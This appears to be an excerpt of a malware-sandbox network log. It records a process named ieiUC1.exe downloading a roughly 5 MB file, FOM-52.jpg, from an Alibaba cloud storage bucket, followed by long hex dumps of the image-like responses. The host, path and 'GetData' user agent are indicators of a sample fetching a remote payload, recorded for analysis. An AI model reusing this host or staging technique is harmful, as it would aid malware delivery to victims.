                                                                        2025-01-14 04:12:23 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                        Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                                        Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                                        Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                                        Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                                        Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                                        Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                                        Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                                        Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                                        Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                                        2025-01-14 04:12:23 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                                        Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.11.2049766118.178.60.94431016C:\Users\user\Documents\ieiUC1.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:12:34 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                                        User-Agent: GetData
                                                                        Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:12:35 UTC547INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:12:35 GMT
                                                                        Content-Type: image/jpeg
                                                                        Content-Length: 5062442
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E433A0BE3737355206EF
                                                                        Accept-Ranges: bytes
                                                                        ETag: "70C21DA900796B279A09040B00953E40"
                                                                        Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 360383310743409046
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                        x-oss-server-time: 65
                                                                        2025-01-14 04:12:35 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                        Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                        Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                                                        Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                                                        Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                                                        Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                                                        Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                                                        Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                                                        2025-01-14 04:12:35 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                                                        Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
